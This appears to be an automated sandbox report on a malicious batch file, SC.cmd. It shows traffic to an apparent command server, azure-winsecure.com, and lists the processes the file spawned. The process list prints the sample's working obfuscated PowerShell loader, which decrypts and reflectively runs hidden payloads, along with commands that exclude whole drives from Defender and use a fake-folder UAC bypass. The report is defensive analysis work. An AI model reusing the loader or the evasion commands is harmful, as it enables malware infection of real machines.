                                                                  Oct 3, 2024 14:53:59.200213909 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:59.309967995 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:59.356435061 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:59.392410994 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:59.398284912 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:59.398364067 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:59.403861046 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:54:24.481534958 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:54:24.587061882 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:54:49.590893030 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:54:49.616342068 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:55:14.624330044 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:55:14.629249096 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:55:39.637850046 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:55:39.643820047 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:56:04.653486013 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:56:04.658627033 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:56:29.669199944 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:56:29.674746990 CEST700049736154.216.20.132192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 3, 2024 14:52:37.263644934 CEST6305153192.168.2.41.1.1.1
                                                                  Oct 3, 2024 14:52:37.746819019 CEST53630511.1.1.1192.168.2.4
                                                                  Oct 3, 2024 14:52:39.659583092 CEST5149453192.168.2.41.1.1.1
                                                                  Oct 3, 2024 14:52:39.667623043 CEST53514941.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Oct 3, 2024 14:52:37.263644934 CEST192.168.2.41.1.1.10xfc77Standard query (0)azure-winsecure.comA (IP address)IN (0x0001)false
                                                                  Oct 3, 2024 14:52:39.659583092 CEST192.168.2.41.1.1.10x1c02Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Oct 3, 2024 14:52:36.988704920 CEST1.1.1.1192.168.2.40xd1d3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Oct 3, 2024 14:52:36.988704920 CEST1.1.1.1192.168.2.40xd1d3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Oct 3, 2024 14:52:37.746819019 CEST1.1.1.1192.168.2.40xfc77No error (0)azure-winsecure.com154.216.20.132A (IP address)IN (0x0001)false
                                                                  Oct 3, 2024 14:52:39.667623043 CEST1.1.1.1192.168.2.40x1c02No error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false
                                                                  • ipwho.is
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449742195.201.57.904435432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-10-03 12:52:40 UTC150OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                                                  Host: ipwho.is
                                                                  Connection: Keep-Alive
                                                                  2024-10-03 12:52:40 UTC223INHTTP/1.1 200 OK
                                                                  Date: Thu, 03 Oct 2024 12:52:40 GMT
                                                                  Content-Type: application/json; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Server: ipwhois
                                                                  Access-Control-Allow-Headers: *
                                                                  X-Robots-Tag: noindex
                                                                  2024-10-03 12:52:40 UTC1019INData Raw: 33 65 66 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72
                                                                  Data Ascii: 3ef{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.33", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yor


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:08:52:16
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SC.cmd" "
                                                                  Imagebase:0x7ff6078a0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:1
                                                                  Start time:08:52:16
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:2
                                                                  Start time:08:52:16
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){ IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle = $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU')) { $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                                                                  Imagebase:0x7ff6078a0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:08:52:16
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:4
                                                                  Start time:08:52:18
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:08:52:23
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:08:52:23
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:08:52:25
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff693ab0000
                                                                  File size:496'640 bytes
                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:08:52:32
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
                                                                  Imagebase:0x800000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:08:52:32
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:08:52:32
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows \System32\ComputerDefaults.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows \System32\ComputerDefaults.exe"
                                                                  Imagebase:0x7ff64d600000
                                                                  File size:81'920 bytes
                                                                  MD5 hash:D25A9E160E3B74EF2242023726F15416
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:08:52:33
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
                                                                  Imagebase:0x7ff6078a0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:08:52:33
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:08:52:33
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
                                                                  Imagebase:0x7ff6eef20000
                                                                  File size:55'320 bytes
                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Target ID:15
                                                                  Start time:08:52:34
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                  Imagebase:0x7ff6eef20000
                                                                  File size:55'320 bytes
                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:08:52:37
                                                                  Start date:03/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:2.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:8
                                                                    Total number of Limit Nodes:1
                                                                    execution_graph 11142 7ffd9b8bd4f9 11144 7ffd9b8bd50f 11142->11144 11143 7ffd9b8bd552 11144->11143 11145 7ffd9b8bd67d CreateFileW 11144->11145 11146 7ffd9b8bd6de 11145->11146 11147 7ffd9b8b45ea 11148 7ffd9b8ffc40 GetFileType 11147->11148 11150 7ffd9b8ffcc4 11148->11150

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 7ffd9b8b6e00-7ffd9b8bc73a 4 7ffd9b8bc73c-7ffd9b8bc74c 0->4 5 7ffd9b8bc74e-7ffd9b8bc75f 0->5 4->4 4->5 6 7ffd9b8bc770-7ffd9b8bc7a1 5->6 7 7ffd9b8bc761-7ffd9b8bc76f 5->7 11 7ffd9b8bc7f7-7ffd9b8bc7fe 6->11 12 7ffd9b8bc7a3-7ffd9b8bc7a9 6->12 7->6 13 7ffd9b8bc800-7ffd9b8bc801 11->13 14 7ffd9b8bc83f-7ffd9b8bc868 11->14 12->11 15 7ffd9b8bc7ab-7ffd9b8bc7ac 12->15 16 7ffd9b8bc804-7ffd9b8bc807 13->16 17 7ffd9b8bc7af-7ffd9b8bc7b2 15->17 18 7ffd9b8bc869-7ffd9b8bcb2c call 7ffd9b8b4620 16->18 19 7ffd9b8bc809-7ffd9b8bc81a 16->19 17->18 21 7ffd9b8bc7b8-7ffd9b8bc7c8 17->21 62 7ffd9b8bcb33-7ffd9b8bcb93 18->62 22 7ffd9b8bc836-7ffd9b8bc83d 19->22 23 7ffd9b8bc81c-7ffd9b8bc822 19->23 24 7ffd9b8bc7ca-7ffd9b8bc7ec 21->24 25 7ffd9b8bc7f0-7ffd9b8bc7f5 21->25 22->14 22->16 23->18 28 7ffd9b8bc824-7ffd9b8bc832 23->28 24->25 25->11 25->17 28->22 63 7ffd9b8bcb9a-7ffd9b8bcbb6 62->63 65 7ffd9b8bcbb8-7ffd9b8bcbba 63->65 66 7ffd9b8bcbbc-7ffd9b8bcbd5 63->66 68 7ffd9b8bcbd7-7ffd9b8bcbe5 65->68 66->68 69 7ffd9b8bcbeb-7ffd9b8bcc71 call 7ffd9b8b7be8 68->69 70 7ffd9b8bcc72-7ffd9b8bcc9e 68->70 69->70 74 7ffd9b8bcd58-7ffd9b8bcd98 70->74 75 7ffd9b8bcca4-7ffd9b8bcd57 call 7ffd9b8b7b98 70->75 83 7ffd9b8bce89-7ffd9b8bce97 call 7ffd9b8bcf2e 74->83 84 7ffd9b8bcd9e-7ffd9b8bcdac 74->84 75->74 95 7ffd9b8bceaa-7ffd9b8bceb5 83->95 96 7ffd9b8bce99-7ffd9b8bcea9 83->96 88 7ffd9b8bcdb2-7ffd9b8bcdbd 84->88 89 7ffd9b8bce41-7ffd9b8bce6f 84->89 101 7ffd9b8bce82-7ffd9b8bce86 89->101 102 7ffd9b8bce71-7ffd9b8bce81 89->102 104 7ffd9b8bceb7-7ffd9b8bcefb call 7ffd9b8b2ed8 95->104 105 7ffd9b8bcf0d-7ffd9b8bcf2d 95->105 96->95 101->83 102->101 104->105
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1770932946.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ZK_H
                                                                    • API String ID: 0-3156204226
                                                                    • Opcode ID: cbc70cec052364ec5d743d6d53df90cc169f08997dd88a7388d69e8d8f655aab
                                                                    • Instruction ID: cb3333e6c774cd797aed050be1779a36df999f375ae62ab33f310d07fe768093
                                                                    • Opcode Fuzzy Hash: cbc70cec052364ec5d743d6d53df90cc169f08997dd88a7388d69e8d8f655aab
                                                                    • Instruction Fuzzy Hash: 3C424B71B0EA8D4FE759DB3898697A577D1EF59310F0402FED05AC71E7DD24A8028B81

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1770932946.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ZK_H
                                                                    • API String ID: 0-3156204226
                                                                    • Opcode ID: 36b3a40159f8c9531d1be6d77d171b2d7666e874f49f5d432b0f1cf8c02293a3
                                                                    • Instruction ID: a2cb90e372644d96dc3939815f327e74191d45959e2358d8a1e75ba9fe3c9752
                                                                    • Opcode Fuzzy Hash: 36b3a40159f8c9531d1be6d77d171b2d7666e874f49f5d432b0f1cf8c02293a3
                                                                    • Instruction Fuzzy Hash: 6BE1F8B2B0E9890FEB5DDB3858297A977D1EF65304F0542FFD04AC72E6DD2858028B81

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1770932946.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ZK_H
                                                                    • API String ID: 0-3156204226
                                                                    • Opcode ID: fc60644ed436b5aa5783ccd6911ad79cbddaf04b8bfcc1d5f2ceb686f255522f
                                                                    • Instruction ID: fc96f3862d1cecd7330f22aad91dca9c6c2f5a74b32ab5b61ed22ff2f2b505c3
                                                                    • Opcode Fuzzy Hash: fc60644ed436b5aa5783ccd6911ad79cbddaf04b8bfcc1d5f2ceb686f255522f
                                                                    • Instruction Fuzzy Hash: B1B1E4B2B0EA890FE7599B7858397697BD1EF69304F0541FFD04AC72E7DD2858028B81

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1770932946.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b5663e3165a8a707099dd421bdc7581a263c644844822ddebef0510de7db375
                                                                    • Instruction ID: 65d2ac5918ef949d6c9facc1b1a0aa0276a2656b168c0a6a10b4ffe476ce99bf
                                                                    • Opcode Fuzzy Hash: 9b5663e3165a8a707099dd421bdc7581a263c644844822ddebef0510de7db375
                                                                    • Instruction Fuzzy Hash: F9A1F7B2B0E9890FE7599B7858397657BC1EF69304F0541FFC04AC72E7DD2458028B81

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1770932946.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 3f7327454b98d32caf22fd90a23eb219ee288285a63845fff60687f9f784d2db
                                                                    • Instruction ID: 1bbd653f4589f4986a700f5c9bcf2e64f82070356411ced185b0ff26f857895c
                                                                    • Opcode Fuzzy Hash: 3f7327454b98d32caf22fd90a23eb219ee288285a63845fff60687f9f784d2db
                                                                    • Instruction Fuzzy Hash: 6C71F871A0DA584FE758DF6CD855BA97BE0FF59320F0502BFE04DD32A2DB24A8018B81

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 220 7ffd9b8b45da-7ffd9b8bd673 224 7ffd9b8bd675-7ffd9b8bd67a 220->224 225 7ffd9b8bd67d-7ffd9b8bd6dc CreateFileW 220->225 224->225 226 7ffd9b8bd6de 225->226 227 7ffd9b8bd6e4-7ffd9b8bd70c 225->227 226->227
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1770932946.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: a546eb3630c16aff27149dc518407fb80811c379f6a99d030785ab3daca5c30a
                                                                    • Instruction ID: 764c3ed39d597edae2afcbc5002531947dcc40154a1d4909e98b67add6703635
                                                                    • Opcode Fuzzy Hash: a546eb3630c16aff27149dc518407fb80811c379f6a99d030785ab3daca5c30a
                                                                    • Instruction Fuzzy Hash: DE31A47191CA1C9FDB58EF58D845AF977E0FB69321F10422EE04DE3251DB70A8018BC1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 295 7ffd9b8b45ea-7ffd9b8ffcc2 GetFileType 299 7ffd9b8ffcca-7ffd9b8ffcef 295->299 300 7ffd9b8ffcc4 295->300 300->299
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1770932946.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID:
                                                                    • API String ID: 3081899298-0
                                                                    • Opcode ID: a8b720d122bbd45acf8646d3f88a7200fc0f870a48f7b0321717ac7153e81738
                                                                    • Instruction ID: e4495cf10c459e5355cc80a8138aa02890c307d2cb795aa17b14aeb9c2beef94
                                                                    • Opcode Fuzzy Hash: a8b720d122bbd45acf8646d3f88a7200fc0f870a48f7b0321717ac7153e81738
                                                                    • Instruction Fuzzy Hash: C721B530A08A1C9FDB5CDB58D845BF977E0FB59321F10412ED04AD3651DB71A812CB90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 468 7ffd9b9815dd-7ffd9b9815e7 469 7ffd9b9815ee-7ffd9b9815ff 468->469 470 7ffd9b9815e9 468->470 472 7ffd9b981601 469->472 473 7ffd9b981606-7ffd9b981617 469->473 470->469 471 7ffd9b9815eb 470->471 471->469 472->473 474 7ffd9b981603 472->474 475 7ffd9b98161e-7ffd9b98162f 473->475 476 7ffd9b981619 473->476 474->473 478 7ffd9b981631 475->478 479 7ffd9b981636-7ffd9b981647 475->479 476->475 477 7ffd9b98161b 476->477 477->475 478->479 480 7ffd9b981633 478->480 481 7ffd9b98164e-7ffd9b98170f 479->481 482 7ffd9b981649 479->482 480->479 486 7ffd9b981926-7ffd9b981984 481->486 487 7ffd9b981715-7ffd9b98171f 481->487 482->481 484 7ffd9b98164b 482->484 484->481 505 7ffd9b9819af-7ffd9b9819bb 486->505 506 7ffd9b981986-7ffd9b9819ad 486->506 488 7ffd9b981721-7ffd9b981739 487->488 489 7ffd9b98173b-7ffd9b981748 487->489 488->489 496 7ffd9b98174e-7ffd9b981751 489->496 497 7ffd9b9818bb-7ffd9b9818c5 489->497 496->497 499 7ffd9b981757-7ffd9b98175f 496->499 500 7ffd9b9818d8-7ffd9b981923 497->500 501 7ffd9b9818c7-7ffd9b9818d7 497->501 499->486 504 7ffd9b981765-7ffd9b98176f 499->504 500->486 507 7ffd9b981771-7ffd9b98177f 504->507 508 7ffd9b981789-7ffd9b98178f 504->508 513 7ffd9b9819c6-7ffd9b9819d7 505->513 506->505 507->508 512 7ffd9b981781-7ffd9b981787 507->512 508->497 510 7ffd9b981795-7ffd9b981798 508->510 514 7ffd9b9817e1 510->514 515 7ffd9b98179a-7ffd9b9817ad 510->515 512->508 526 7ffd9b9819e0-7ffd9b9819ef 513->526 527 7ffd9b9819d9 513->527 518 7ffd9b9817e3-7ffd9b9817e5 514->518 515->486 528 7ffd9b9817b3-7ffd9b9817bd 515->528 518->497 519 7ffd9b9817eb-7ffd9b9817ee 518->519 524 